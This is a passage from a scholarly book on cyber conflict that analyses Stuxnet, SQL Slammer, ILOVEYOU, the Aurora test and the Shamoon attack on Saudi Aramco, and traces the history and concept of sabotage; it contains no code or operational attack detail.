Before Stuxnet started sabotaging processes, it intercepted input values 
from sensors, such as the state of a valve or operating temperatures, 
recorded these data, and then provided the legitimate controller code 
with prerecorded fake input signals, while the actual processes in the 
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hidden background were manipulated. The objective was not just to fool 
operators in a control room, but to circumvent and compromise digital 
safety systems. Stuxnet also hid the modifications it made to the control¬ 
ler code. And even before launching a payload, Stuxnet operated steal¬ 
thily: it had mechanisms to evade anti-virus software, it was able to hide 
copies of its files on removable drives and hide its own program blocks 
when an enumeration was enforced on a controller, and it erased itself 
from machines that did not lead to the target. 

The resources and investment that went into Stuxnet could only be 
mustered by a “cyber superpower,” argued Ralph Langner, a German 
control system security consultant who first extracted and decompiled 
the attack code. 22 The Obama administration later admitted that it co¬ 
developed the sabotage malware together with Israeli experts in compu¬ 
ter attacks. The operation’s first challenge was getting the intelligence 
right. Each single control system is a unique configuration, so the attac¬ 
kers needed superb information about the specific system’s schematics. 
“They probably even knew the shoe size of the operators,” said Langner. 
The designs of the target system were probably stolen or even exfiltrated 
from Iran by an earlier piece of espionage software related to the final 
Stuxnet, known as the beacon. Another aspect is the threat’s design 
itself: the code was so specific that it is likely that the attackers had to set 
up a mirrored environment to refine their attack vehicle, which could 
have included a mock enrichment facility. 23 Stuxnet also had network 
infection routines; it was equipped with peer-to-peer update mecha¬ 
nisms that seem to have been capable of communicating even with 
infected equipment without an Internet connection, and injecting code 
into industrial control systems while hiding the code from the operator. 
Programming such a complex agent required time, resources, and an 
entire team of core developers as well as quality assurance and manage¬ 
ment. 24 The threat also combined expensive and hard-to-get items: four 
zero-day exploits (i.e. previously unknown and hence highly valuable 
vulnerabilities); two stolen digital certificates; a Windows rootkit 
(software granting hidden privileged access); and even the first-ever Pro¬ 
grammable Logic Controller rootkit. 25 For the time being it remains 
unclear how successful the Stuxnet attack against Iran’s nuclear program 
actually was. But it is clear that the operation has taken computer sabo¬ 
tage to an entirely new level. 

Stuxnet is also noteworthy in several other respects. One observation 
concerns the high amount of intelligence programmed into the weapon 
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itself. The attack vehicle was coded in a way that allowed its handlers in 
Washington to connect to the worm through a command-and-control 
server. But because the final target was not networked, “all the functio¬ 
nality required to sabotage a system was embedded directly in the 
Stuxnet executable,” Symantec observed in the W32.Stuxnet Dossier, 26 
Another observation is that it did not create collateral damage. Cyber 
weapons with aggressive infection strategies built in, a popular argument 
goes, are bound to create uncontrollable collateral damage. 27 The under¬ 
lying image is that of a virus escaping from the lab to cause an unwanted 
pandemic. But this comparison is misleading. Stuxnet infected a very 
large number of hosts—but the worm did not create any damage on 
these computers. In the known cases of sophisticated cyber weapons, 
collateral infections did not mean inadvertent collateral damage. 

Another illustrative demonstration of a cyber weapon took place a few 
years later “on range.” On range means that it happened in a testing and 
training environment. In an experiment in 2006, the Idaho National 
Laboratory tested the so-called “Aurora” vulnerability that left some 
North American power stations exposed to electronic attack. The test 
target was a $lm, 27-ton industrial diesel generator. The goal: perma¬ 
nently disabling the enormous machine in a controlled environment 
through an Internet-based cyber attack from 100 miles away. In the test, 
the generator started shuddering, shaking, and smoke came puffing out, 
ultimately disabling the green machine. The lab reportedly came up with 
twenty-one lines of code that “caused the generator to blow up.” 28 The 
malicious code caused the machine’s circuit breakers to cycle on-and-off 
in rapid succession, causing permanent damage through vibration. 29 

The line between what is a cyber weapon and what is not a cyber 
weapon is subtle. But drawing this line is extraordinarily important. For 
one it has security consequences: if a tool has no potential to be used as 
a weapon and to do harm to one or many, it is simply less dangerous. 
Secondly, drawing this line has political consequences: an unarmed 
intrusion is politically less explosive than an armed one that has the 
potential to damage buildings and injure and kill people. Thirdly, the 
line has legal consequences: identifying something as a weapon means, 
at least in principle, that it may be outlawed and its development, pos¬ 
session, or use made punishable. It follows that the line between a wea¬ 
pon and non-weapon is conceptually significant: identifying something 
as not a weapon is an important first step towards properly understan- 
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ding the problem at hand and to developing appropriate responses. The 
most common and probably the most costly form of cyber attack aims 
to spy. But even a highly sophisticated piece of malware that is deve¬ 
loped and used for the sole purpose of covertly exfiltrating data from a 
network or machine is not a weapon. Consequently, the law of armed 
conflict does not deem espionage an armed attack. Three noteworthy 
cases that may be confused with cyber weapons help make the concept 
more precise. 

The first example of what does not constitute a cyber weapon is the 
weaponization of gadgets, rather than code. Technically sophisticated 
operations are well known in the world of espionage, for instance tiny 
listening bugs or exploding pens and cigars. Such cases figure more pro¬ 
minently in fiction than in reality, but occasionally they do happen. One 
of the best-known James Bond-style examples is the assassination of 
Yahya Abd-al-Latif Ayyash, aka “the engineer.” Ayyash, an important 
bomb-maker for Hamas and Islamic Jihad, built the improvised explo¬ 
sive devices used in numerous suicide bombings and terrorist attacks. 
He had been one of Israel’s most-wanted enemies. On 5 January 1999, 
the Shin Bet, Israel’s domestic intelligence service, assassinated him by 
placing 15 grams of RDX, an explosive nitroamine, into the cellphone 
of one of Ayyash’s trusted friends. Israeli agents tricked that friend’s 
uncle and his wife, who unknowingly helped place the deadly phone at 
the engineer’s ear, assuming they would help the Israelis eavesdrop on 
Ayyash, not execute him. 30 

Lesser known is the fact that Hezbollah had pulled off a similar if less 
sophisticated stunt in the same year, penetrating one of the IDF’s most 
secretive and technologically sophisticated entities, Unit 8200, which 
allegedly helped to build Stuxnet a decade later. In early 1999, a Hez¬ 
bollah cellphone with a depleted battery was found in a raid in Southern 
Lebanon. A military intelligence officer turned over the device to the 
signal intelligence unit and it was brought to the headquarters of Unit 
8200 close to Glilot junction north of Tel Aviv. When two officers tried 
to connect the device to an appropriate charger, it detonated, severely 
injuring both. One lost his hand. 31 Previously harmless devices may 
indeed be turned into deadly weapons by secretly (or overtly) adding 
explosives or other harmful functions. But such militant gadgetry 
belongs more to the category of improvised explosive devices, IEDs, 
than to that of weaponized code. 
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The second non-weapon discussed here is intellectually more interes¬ 
ting: the ILOVEYOU worm, perhaps the most costly generic intrusion 
to date. On 4 May 2000, a new malware rapidly spread by exploiting a 
generic scripting engine. A 24-year-old undergraduate student in the 
Philippines, Onel De Guzman, had programmed the worm. Origina¬ 
ting in Manila, it spread across the globe in one day, infecting around 
45 million Windows PCs. The worm spread by sending emails to entire 
address books, thus pretending to be a love letter from a known and 
trusted person. The “Love Bug,” as the media called the work, was 
capable of overwriting audio and picture files, replacing them with mali¬ 
cious code. In Britain, 30 per cent of all email servers in private compa¬ 
nies were brought down by the volume of requests. The estimated 
worldwide damage exceeded $10bn. Among the infected targets were 
governments and defense establishments. Britain’s House of Commons 
saw its internal communication system immobilized. The virus infected 
four classified internal systems in the Pentagon, according to Kenneth 
Bacon, then the DoD spokesperson, 32 and it was also found on around 
a dozen CIA computers. 33 ILOVEYOU, it is very important to note, did 
not exfiltrate any data to external servers. The small software did not 
even have a command-and-control infrastructure, but was acting in a 
primitively autonomous way. Yet there are instances when such generic 
pieces of malware could lead to physical damage. This almost happened 
in early 2003 in Ohio. 

A third example that may be mistaken for a cyber weapon is the so- 
called Slammer Worm. On 25 January 2003, this highly effective worm 
led to a so-far unique incident at the Davis-Besse nuclear power plant in 
Oak Harbor, Ohio, about 80 miles west of Cleveland. The plant opera¬ 
ted a single light water reactor. Ten months earlier, in March 2002, the 
station had already suffered one of America’s most serious nuclear safety 
incidents, this one entirely unrelated to a computer flaw. Maintenance 
workers had discovered that borated water which had leaked from a 
cracked rod had eaten a football-sized hole into the reactor head. As a 
result, the reactor was shut down for repair works that took two years. 
So Davis-Besse was offline when the Slammer worm hit. The Slammer 
worm entered the plant through an unnamed contractor, via a simple 
Tl telephone line that connected the contractor’s computers to the 
business network of FirstEnergy, the utility company that operated the 
plant. This Tl line, according to a later investigation, bypassed the 
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plant’s firewall. Dale Wuokko of FirstEnergy explained the bypassed 
firewall to the Nuclear Regulatory Commission after the incident: “This 
is in essence a backdoor from the Internet to the Corporate internal 
network that was not monitored by Corporate personnel,” Wuokko 
wrote, “some people in Corporate’s Network Services department were 
aware of this Tl connection and some were not.” 

SQL Slammer, as the worm is known, started to spread like an Inter¬ 
net wildfire on the early morning of Saturday, 25 January 2003, at 05:30 
Greenwich Mean Time. The worm exploited a buffer overflow flaw in a 
widely used Microsoft SQL server. The small piece of code generates 
random IP addresses and then copies itself to those addresses. If the 
program gets lucky, and one of these addresses leads to a host that hap¬ 
pens to be running an unpatched version of Microsoft’s SQL Server, 
then this machine becomes infected and begins randomly spraying the 
web with more worms. The vulnerability used by the worm had in fact 
been known for half a year, and Microsoft had made a security update 
available six months before Slammer went viral—and to Microsoft’s 
credit even before the vulnerability became public. But not everybody 
had installed the patch, including many at Microsoft and, as it turned 
out, the operators at Davis-Besse. In fact the plant operators didn’t even 
know there was a patch for the vulnerability. 

A few things are noteworthy about Slammer. The worm itself was 
tiny; its code had a mere 376 bytes and fitted inside a single Internet 
packet (this means the worm’s code was smaller than an empty email 
without any text and subject line). Additionally, the worm used a speci¬ 
fic Internet protocol that allows a computer to send a message to ano¬ 
ther computer without requiring prior communications to set up special 
transmission channels, other than email or browser data. An attack 
consisted of a single packet sent to UDP port 1434. The worm was 
therefore able to broadcast scans without the need for a prior response 
from its potential victims. This meant that each infected host blasted out 
single yet effective “fire-and-forget” packets that contained the worm. 
An infected machine with a normal Internet connection speed of 100- 
Mbps could realistically produce 26,000 scans per second. As a result, 
Slammer was the fastest worm in the history of computing. 34 When 
Slammer’s rapid spread slowed down Internet traffic globally that mor¬ 
ning, many computers lost all legitimate traffic yet they were still able to 
send and receive the worm because it was so small and so versatile. Ana- 


49 


CYBER WAR WILL NOT TAKE PLACE 


lysis estimated that the worm infected more than 75,000 hosts, spraying 
the Internet with scans from each of those. The resulting slowdown 
caused computer network outages, cancelled airline flights, failures in 
ATM machines, and even interference with elections. 35 Davis-Besse’s 
corporate network was affected by that global flood of confused packets 
and slowed down as well. The plant’s business network, it soon turned 
out, was connected to the plant’s industrial control network, which is 
not supposed to be the case (such connections make it easier for the 
plant’s operators to access real-time data, but ideally these connections 
should be read-only). At 16:00 local time, the operators of the power 
plant itself noticed that the network was slowing down. Fifty minutes 
later, the Safety Parameter Display Unit System crashed. This system is 
designed to monitor a plant’s safety indicators, such as coolant systems, 
core temperatures, and external radiation sensors. 36 Twenty-three minutes 
later, at 17:13, the less critical Plant Process Computer also crashed. 
Both systems, it should be noted, had analogue backups in place which 
were not affected by the rummaging worm. 37 After six hours the plant’s 
engineers had reinstated both systems. 

Three things should be noted about the Davis-Besse incident. First, 
Slammer’s nuclear attack was concerning, but it was a miss: even if 
Davis-Besse had not been “in a safely defueled condition,” as the NRC’s 
chairman said in response to a concerned letter from a congressman, the 
backup systems would likely have prevented a more serious incident. 38 
Second, Slammer was the precise opposite of a targeted attack. The 
worm’s impact on Davis-Besse was entirely random, and partly the result 
of bad systems administration at the nuclear plant. Predicting and plan¬ 
ning with such a unique set of coincidences would be a significant chal¬ 
lenge for an attacker focused on a specific target or set of targets. Yet, 
thirdly, it should also be noted that the incident, despite these limita¬ 
tions, demonstrates the real risk of a catastrophic cyber attack, even the 
risk of an accidental cyber attack of major proportions. 

So far this chapter has discussed a number of different cyber attacks, 
including targeted ones like Stuxnet and generic ones like Slammer. 
These cases bring to light a conceptual tension between highly generic 
and untargeted malware and highly specific and targeted malware. At 
closer examination, this tension gives rise to three problems that are 
probably unique to the offensive use of cyber weapons. 

The first problem will be called the problem of generics here. The gene¬ 
ric-specific tension probably has no useful equivalent in the conventio- 
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nal use of force. On one end of the spectrum is the highly targeted use 
of force, for instance by a sniper: there’s only one target, one bullet, 
either hit or miss. On the other end of the spectrum is a highly infec¬ 
tious and virulent biological agent: once released, the killer virus may 
spread beyond the initial attacker’s and anybody else’s control. These 
comparisons are highly imperfect. But they help illustrate the problem 
of generics for architects of cyber weapons. In most if not all circums¬ 
tances, those seeking to deploy code for political purposes would want 
to avoid both extremes: developing a weapon that is so specific that it 
may only be able to hit one specific target system. Such a one-off attack 
is impossible to repeat, thus limiting its threatening utility. Alternatively 
they would want to avoid developing a weapon that is so generic that it 
could spin out of control once released, threatening to create uncontrol¬ 
lable collateral damage. Based on the available empirical evidence, the 
first scenario is significantly more realistic than the second one. Yet the 
risks need to be properly understood. 

Computer security experts of various strains do not necessarily have 
a good understanding of the full potential of generic intrusions. This 
lack of such knowledge arises from the complexity and uniqueness of 
most computer installations, with a bespoke mix of hardware types, 
networks, and software systems, including in most cases software appli¬ 
cations that can be many years old, so-called “legacy systems.” Compo¬ 
nents of these large-scale systems may be updated and exchanged on a 
case-by-case basis, so that the larger system and its processes are conti¬ 
nually changing. Different parts of such a complex system may be 
owned, designed, operated, maintained, and administered by different 
organizations. This dynamic applies to modern commercial, governmen¬ 
tal, and military installations. In fact the problem is so large that it has 
become a subject for research in computer science. American and Euro¬ 
pean governments and other funders have sponsored research on large- 
scale complex IT systems. Industrial control systems fall into this 
category. In SCADA networks and their programmable field devices, 
attack vectors and configurations tend to be rather specific, so that a 
widely generic attack seems to be unlikely. 

Yet the problem of generics remains empirically unexplored. Dale 
Peterson, one of the world’s leading SCADA security experts, has distin¬ 
guished three types of attack against industrial control systems: simple 
attacks that merely crash systems or interrupt their correct operation, for 
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instance by exploiting a widespread lack of authentification in those 
systems; moderate attacks where attackers have intelligence on a process 
and learn how to damage a physical component or subsystem; and com¬ 
plex attacks, where attackers modify a process in a stealthy manner over 
an extended period of time. Simple attacks require less process intelli¬ 
gence than a complex attack. To illustrate the point, Peterson offers an 
example of how rogue firmware could be loaded onto the Rockwell 
Automation ControlLogix PLC: 

An attacker could develop and load a set of actions into the rogue firm¬ 
ware which could reboot the PLC, report a percentage of wrong values, 
issue random write commands, etc. The rogue firmware would use a 
pseudo-random number generator to select both the type and timing of a 
series of attacks, producing intermittent PLC failures. The rogue firmware 
could also easily be spread with a worm, making for a variety of intermit¬ 
tent failures across all PLCs that would be very difficult to diagnose. This 
is a simple attack that would require little process knowledge . 39 

Simple generic attacks against a specific set of machine configurations 
are possible, at least in theory. The 64,000-dollar question is where the 
limits are of generic higher-order attacks. Stuxnet, the most sophistica¬ 
ted attack on record, was extremely specific and highly targeted—the 
worm’s collateral infections on seemingly random machines did not have 
any real consequences for the owners and users of those computers. But 
it is unclear whether the next generation of high-powered cyber weapons 
will be equally specific in design, although this will probably be the case. 
The future will likely bring the answer, either through experience or 
through research. 

The second unique and difficult problem of cyber weapons is the 
problem of intentionality. This problem arises in unexpected ways in the 
context of weaponized code. The core question is when a specific attack 
on a specific target ceases to be—or begins to be—an instrument of a 
specific attacker. To answer this question, the notion of a “cyber attack” 
requires clarification. Cyber attack includes both non-violent events, like 
denial of service attacks or indeed most malware incidents that illegiti¬ 
mately affect a computer or a network of computers, and those attacks 
that can cause a violent outcome. Even (and especially) relatively short 
and simple malware, like the SQL Slammer worm, may propagate itself 
and reach targets in a generic rather than in a specific fashion. Malware, 
simply put, may identify potential hosts through generic scans, propa- 
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gate itself through built-in infection mechanisms, infiltrate a new host, 
execute itself on that host (or get executed by an unknowing user), and 
then repeat this cycle. Such malware qualifies, in the language of agent 
theory, as an autonomous agent. 40 Autonomous agents act autono¬ 
mously. The actions of such autonomous agents can therefore be seen as 
a form of attack, not merely as an accident. 

But the autonomy of software agents has a problematic flipside. The 
Slammer Worm could indeed be compared to a biological virus, or even 
to a wildfire: once the worm began to spread on its own, it was literally 
out of control in the sense that the software was not, like other more 
sophisticated malware, at the leash of a command-and-control server. 
Even its author could not stop or contain it any longer. It spread ran¬ 
domly. But weapons are instruments of harm. If the author of an attack 
is unable to control the instrument of harm, then the tool’s instrumen¬ 
tality gets progressively lost. Instrumentality means shaping an oppo¬ 
nent’s or a victim’s behavior—but if the attacker has lost the ability to 
react to an opponent’s change of behavior by adapting the use of the 
instrument, for instance by increasing the level of pain or by ceasing an 
attack, then it would be irrational for the opponent to attempt such a 
moderating change of behavior. It is therefore necessary to distinguish 
between a violent cyber attack and a cyber weapon—to qualify as a cyber 
attack, an incident does not necessarily have to be intentional and ins¬ 
trumental. ILOVEYOU’s effects on the CIA and SQL Slammer’s effects 
on Davis-Besse may qualify as cyber attacks: but although such incidents 
could in theory have violent effects, they have lost their instrumental 
character. As a result, they cannot be regarded as cyber weapons. 

Taken together, the problem of generics and the problem of intentio- 
nality lead to a third problem: the problem of learning agents. Stuxnet is 
noteworthy for something it didn’t do. Stuxnet was an intelligent agent, 
able to make simple decisions based on environmental data, but it was 
not a learning intelligent agent. One confidential study by America’s 
national laboratories estimated that the worm set Iran’s nuclear program 
back by one to two years. “There were a lot of mistakes made the first 
time,” one senior US official was quoted as saying in The New York 
Times. “This was a first generation product. Think of Edison’s initial 
lightbulbs, or the Apple II.” 41 A next generation product could be able 
to learn. Learning software agents and machine learning generally have 
been the focus of much research attention and funding in computer 
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science of the past decade. The defense and intelligence establishments 
in the United States, Britain, and Israel have traditionally been well 
ahead of general trends in computer science research, for instance in 
cryptography or distributed systems. It would be surprising if an intel¬ 
ligent coded weapon capable of learning had not yet been developed. A 
learning weapon could be able to observe and evaluate the specifics of 
an isolated environment autonomously, analyze available courses of 
action, and then take action. By doing so, learning malicious software 
agents would redefine both the problem of generics and the problem of 
intentionality in entirely unprecedented ways. 
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SABOTAGE 


The world economy depends on energy. The most essential source of 
energy is oil and the world’s biggest source of oil is Saudi Arabia. The 
bulk of the country’s oil production is in the hands of its national oil 
company, Saudi Aramco. On 15 August 2012, this pivotal corporate 
behemoth with a workforce of about 54,000 people became the target 
of a cyber attack that knocked out 30,000 of its workstations, about 
three-quarters of the total, turning their Microsoft Windows machines 
into bricks that could not even be booted up. 1 

The attack could have been disastrous. The company has the largest 
proven crude reserves and produces more units of oil than anybody else, 
pumping 9.1 million barrels a day during 2011, 15 per cent more than 
the year before. It manages more than 100 oil and gas fields, including 
Ghawar Field, the world’s largest oil field. The firm’s reach is global. Its 
operations include exploration, drilling, producing, refining, distribu¬ 
ting, and marketing oil, gas, petroleum, and other petrochemicals. Saudi 
Aramco is headquartered in Dhahran, a small city in Saudi Arabia’s 
Eastern Province; the Kingdom of Bahrain is a 20-mile driving distance 
to the west. This geographical location contains a clue to the alleged 
motivation of the cyber attack that hit on 15 August, just when many 
employees were about go on leave for Eid ul-Fitr, the Muslim holiday 
that marks the end of Ramadan. A targeted computer virus managed to 
penetrate the company’s business network and, once inside, rapidly 
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spread through shared network connections. The malware’s main func¬ 
tion was deleting data and making the infected Windows computer 
unbootable by overwriting the machine’s Master Boot Record files. 
Saudi Aramco instantly put out word that its core operations, oil explo¬ 
ration, production, and refinement were not affected by the attack. 

Wider operations could easily have been affected. The computer sys¬ 
tems that control plant operations and oil production on the company’s 
oil and gas fields may have been isolated from the Internet, as Saudi 
Aramco claimed they were. In any case, the virus used for the attack was 
incapable of harming any of the systems that commonly run on Indus¬ 
trial Control Systems. Such SCADA systems, which control valves and 
pumps in remote oil installations, are not well defended and present 
rather easy targets for skilled attackers. So a more sophisticated attack 
could well have affected oil production. But even without directly affec¬ 
ting field operations—one must assume that almost all other business 
operations took a hard hit for two chaotic weeks, including general 
administration, human resources, customer support, marketing, etc.— 
the hours after the attack were “critical” and a “humongous challenge,” 
in the words of one company insider. 2 Some of the company’s websites 
remained offline for more than a week. Emails bounced back. Engineers 
feared a follow-on attack. In the end Saudi Aramco managed to put its 
network back online only on Saturday, 31 August, more than ten days 
after the initial attack. 

The Aramco attack raises a number of intriguing conceptual ques¬ 
tions. The attack was not violent, and it did not have a direct potential 
to be violent, as the more detailed analysis below will show. Yet the 
attackers managed to damage Saudi Aramco’s good reputation and signi¬ 
ficantly disrupted its day-to-day business operations. Was the attack an 
act of sabotage? What is sabotage in general terms, and what is its 
purpose? Does sabotage have to be violent or potentially violent? And 
what is the potential of sabotage in future cyber attacks? 

This chapter argues that malicious software and cyber attacks are ideal 
instruments of sabotage. Cyber attacks which are designed to sabotage 
a system may be violent or, in the vast majority of cases, non-violent. 
The higher the technical development and the dependency of a society 
on technology (including public administration, the security sector, and 
industry), the higher the potential for both violent and non-violent 
sabotage, especially cyber-enabled sabotage. This has a seemingly contra- 
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dictory effect: the higher the number of activists or adversaries that 
choose computer sabotage over physical sabotage, the easier it will be to 
distinguish between violence and non-violence, and the more likely it is 
that saboteurs choose non-violence over violence. 

The argument is unveiled in four stages. The first section will define 
the nature of sabotage and highlight what remains unaffected by the rise 
of cyber attacks. The second section will illustrate the historically deep- 
rooted tension between disablement and destruction, and introduce 
what is affected by the rise of cyber attacks. The chapter then discusses 
the details of a few high-profile computer-sabotage examples. It closes 
with some considerations on the new vulnerabilities of industrial control 
systems that are likely to affect the future of sabotage. 

Sabotage is the deliberate attempt to weaken or disable an economic 
or military system. All sabotage is predominantly technical in nature, but 
it may of course use social enablers. The means used in sabotage may not 
always lead to physical destruction and overt violence. Sabotage may be 
designed merely to disable machines or production processes tempora¬ 
rily, and explicitly to avoid damaging anything in a violent way. If vio¬ 
lence is used, things are the prime targets, not humans, even if the ultimate 
objective may be to change the cost-benefit calculus of decision-makers. 
Sabotage tends to be tactical in nature and will only rarely have opera¬ 
tional or even strategic effects. Sabotage on its own may not qualify as 
an armed attack because the saboteurs may deliberately avoid open 
violence, they may avoid political attribution, but they always aim to be 
instrumental. Both avoiding excessive violence and avoiding identifica¬ 
tion may serve the ultimate goal of sabotage: impairing a technical sys¬ 
tem. Sabotage is therefore an indirect form of attack. The ultimate target 
of all political violence is the mind of human decision-makers, as a 
previous chapter has argued. Political violence against humans is desig¬ 
ned to affect decision-makers, for instance by grabbing as much public 
visibility as possible. Sabotage, in contrast to the use of guns and explo¬ 
sives (or cyber weapons), is not ultimately focused on the human body 
as a vehicle to the human mind—instead, sabotage, first and foremost, 
attempts to impair a technical or commercial system and to achieve a 
particular effect by means of damaging that system. 

The core ideas of sabotage have barely changed in the past century, 
despite the advent of sabotage by cyber attack. Looking back seventy 
years will illustrate this continuity. In 1944, the United States Office of 
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Strategic Services, the CIA’s precursor organization, issued the Simple 
Sabotage Field Manual, and stamped it secret. The document was declas¬ 
sified in 1963. It set out in great detail how to slow down the Axis 
powers. The manual was mainly written as a guide to help recruit insi¬ 
ders working for the Axis powers who did not support the Nazis and 
Fascists and wanted to sabotage the war effort from within. The manual 
was hands-on, and recommended how to use salt, nails, candles, and 
pebbles as weapons, or how to slow down an organization by making 
meetings and bureaucratic procedures as inefficient and faulty as pos¬ 
sible. But the manual also contained a short paragraph on the idea itself, 
which may help clarify the notion of sabotage held by the US intelli¬ 
gence community: 

Sabotage varies from highly technical coup de main acts that require detai¬ 
led planning and the use of specially trained operatives, to innumerable 
simple acts which the ordinary individual citizen-saboteur can perform. 

... Simple sabotage does not require specially prepared tools or equip¬ 
ment; it is executed by an ordinary citizen who may or may not act indi¬ 
vidually and without the necessity for active connection with an organized 
group; and it is carried out in such a way as to involve a minimum danger 
of injury, detection, and reprisal . 3 

All four of the main features contained in the manual and this key 
paragraph still hold true in the context of twenty-first-century cyber 
attacks: online sabotage, firstly, still ranges from highly technical, plan¬ 
ned, and skill-intensive operations on the one end of the spectrum to 
manifold simple acts that citizen-saboteurs can perform. Computer 
sabotage, secondly, may be executed by organized groups and even agen¬ 
cies representing states, or such attacks may be designed and executed 
by single individuals. Software attacks with the goal of sabotaging a 
system, thirdly, are still mostly carried out in ways that involve mini¬ 
mum danger of detection, attribution, and reprisal. And finally it is still 
uniquely skilled insiders who are the potentially most devastating ena¬ 
blers of sabotage, either acting on their own or as representatives of 
outside adversaries. These four dimensions of continuity raise the ques¬ 
tion of how sabotage has changed in the digital age. 

A brief look at the concept’s origins greatly helps to understand some 
of today’s novel features. The word sabotage has a controversial history. 
Its origins date back to the heyday of industrialization in the nineteenth 
century, when workers rebelled against dire conditions in mechanized 
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factories. Emile Pouget, a French anarchist active at the turn of the 
twentieth century, promoted sabotage in pamphlets and other publica¬ 
tions. A sabot is a simple shoe, hollowed out from a single block of soft 
wood, traditionally worn by Breton peasants, and today one of the main 
tourist souvenirs in the Netherlands. The symbol of the wooden shoe 
goes back to the urban myth of French workmen throwing their wooden 
shoes into finely tuned moving machinery parts to clog them up. That 
metaphorical use of “sabotage,” Pouget wrote in 1910, had already been 
around in street slang for decades. “Comme a coups de sabots,” as if hit 
with wooden shoes, stood for working intentionally clumsily, slowly, 
without thought and skill, thus slowing down or halting the process of 
production. 4 The expression soon became more widespread and its 
metaphorical origins were forgotten, especially in cultures that didn’t 
know the sabot. An equivalent in American English is “monkeywren- 
ching,” which refers to the comparable practice of throwing a heavy 
adjustable wrench into the gears of industrial machinery to damage it 
and keep strike-breakers from continuing work. Elizabeth Guriy Flynn, 
a leading organizer for the Industrial Workers of the World, a large 
union also known as the Wobblies, defined sabotage as “the withdrawal 
of efficiency:” 

Sabotage means either to slacken up and interfere with the quantity, or to 
botch in your skill and interfere with the quality of capitalist production 
or to give poor service ... And these three forms of sabotage—to affect the 
quality, the quantity and the service are aimed at affecting the profit of the 
employer. Sabotage is a means of striking at the employer’s profit for the 
purpose of forcing him into granting certain conditions, even as working¬ 
men strike for the same purpose of coercing him. It is simply another 
form of coercion . 5 

Some labor activists and syndicalists explicitly understood sabotage as 
a way to inflict physical damage against the oppressive machinery that 
made their work miserable or threatened the unskilled worker’s liveli¬ 
hood altogether by making manual labor obsolete. Pouget quotes from 
an article published in 1900, a few weeks ahead of an important wor¬ 
kers’ congress in Paris. In it, the Bulletin de la bourse du travail de Mont¬ 
pellier gives recommendations for sabotage: 

If you are a mechanic, it’s very easy for you with two pence worth of 
ordinary powder, or even just sand, to stop your machine, to bring about 
a loss of time and a costly repair for your employer. If you are a joiner or 
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a cabinet maker, what is more easy than to spoil a piece of furniture wit¬ 
hout the employer knowing it and making him lose customers ? 6 

The pamphlet achieved some modest fame for its clever advice on 
how workers could cause accidents and damage without attribution: 
shop-assistants may drop fabrics onto dirty ground, garment workers 
may ignore faults in textiles; engineers may deliberately neglect oiling 
the moving parts of the machines they were supposed to maintain. 
Sabotage was historically understood as a coercive tactic directed against 
property, not against people. Even when it was directed merely against 
machines, the question of whether restive workers should try to destroy 
machinery or merely disable it for a limited period of time was contro¬ 
versial given that the use of violence, even if only directed at machines, 
was a matter of some dispute among syndicalists at the time. Delaying 
production was one thing; destroying property was something else, 
something that could have dire consequences, legally as well as politi¬ 
cally. In America, political opponents had accused the Industrial Wor¬ 
kers of the World, popularly known as the “Wobblies,” of relying mainly 
on crude violence to achieve their goals. Some labor organizers therefore 
considered it necessary to distinguish between violence on the one hand 
and sabotage on the other. Arturo Giovannitti, a prominent Italian- 
American union leader and poet, argued for the latter in the foreword 
to the 1913 English translation of Pouget’s book Sabotage. Sabotage, 
Giovannitti wrote, was: 

Any skilful operation on the machinery of production intended not to 
destroy or render it defective, but only to disable it temporarily and to put 
it out of running condition in order to make impossible the work of scabs 
and thus to secure the complete and real stoppage of work during a strike . 7 

Sabotage is this and nothing but this, he added, using the language of 
political activism rather than the language of scholarship, “It has nothing 
to do with violence, neither to life nor to property.” 8 

Such subtle differences made sense in theory. In practice it was often 
difficult to distinguish between permanent destruction and temporary 
disablement—for several reasons, two of which will serve to highlight 
the novelties of sabotage by cyber attack. The first is the difference 
between hardware and software. If temporarily interrupting a process 
required damaging hardware, then the line between violence and sabo¬ 
tage is hard to draw. This is illustrated by an example from the early 
twentieth century, when telecommunication installations became a 
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target of sabotage. Sabotage had to target hardware, pretty simply, 
because software did not exist yet. During French postal and railway 
strikes in 1909 and 1910, for instance, saboteurs cut signal wires and 
tore down telegraph posts. Cutting a telegraph wire may have been 
intended as temporary disablement, yet it also effectively destroyed pro¬ 
perty. Distinguishing between violence and non-violence was also diffi¬ 
cult for a second reason: the dynamics of group confrontations. Again 
the worker confrontations around the time of the First World War are 
an instructive example: many union activists knew that situations where 
striking workers squared off with the capitalist forces of the state could 
turn violent. Vincent Saint John, a miner, a Wobbly, and one of Ameri¬ 
cas most influential labor leaders, made this point explicit: “I don’t 
mean to say that we advocate violence; but we won’t tell our members 
to allow themselves to be shot down and beaten up like cattle. Violence 
as a general rule is forced upon us.” 9 Such concern was not necessarily 
unjustified. Strikes and worker demonstrations could easily intensify 
into violent riots. A graphic example was the Grabow Riot of 7 July 
1912, a violent confrontation between unionized Fouisiana sawmill 
workers and the Galloway Fumber Company, which left four men dead 
and around fifty wounded. Pre-Internet-age sabotage, in short, easily 
escalated into violence against machines and, in groups, against people. 

Both of these difficulties largely disappear in an age of computer 
attack. Distinguishing violent from non-violent attacks becomes easier. 
Violence is more easily contained and avoided: by default, software 
attacks maliciously affect software and business processes—but dama¬ 
ging hardware and mechanical industrial processes through software 
attack has become far more difficult. The remit of non-violent cyber 
attack, as a consequence, has widened: a well-crafted cyber attack that 
destroys or damages data, although without interfering with physical 
industrial processes, remains non-violent. The Shamoon attack against 
Saudi Aramco of August 2012 is an ideal example. Neither hardware nor 
humans were physically harmed. Yet, by allegedly wiping the hard disks 
of 30,000 computers, the attack created vastly more delay and monetary 
damage for Saudi Aramco than a minor act of sabotage against machi¬ 
nery in one of Aramco’s plants. That may have been easier to fix and 
conceal. The oil giant reportedly hired six specialized computer security 
firms to help the forensic investigation and the post-attack cleanup. 
Fiam Murchu was involved in Symantec’s research into the attack. “We 
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don’t normally see threats that are so destructive,” Murchu told Reuters, 
“It’s probably been 10 years since we saw something so destructive.” 10 
Non-violent cyber attacks, in short, may be more efficient, more dama¬ 
ging, and more instrumental than violent attacks, whether executed 
through cyberspace or not. 

Online attacks also made it easier, or possible in the first place, to 
isolate sabotage from volatile group dynamics. Online sabotage, if it 
relies on group participation at all, is highly unlikely to escalate into real 
bloodshed and street violence—activists and perpetrators of code-borne 
sabotage, after all, may not even be physically present on a street or 
anywhere else. Both of these dynamics are novel. And both will be illus¬ 
trated by a more detailed examination of recent cases that witnessed 
serious acts of sabotage administered through cyber attack. 

A more granular and technical examination of the Shamoon attack is 
instructive. The initially mysterious outage in the then cyber-attack- 
ridden Middle East occurred in the otherwise calm summer month of 
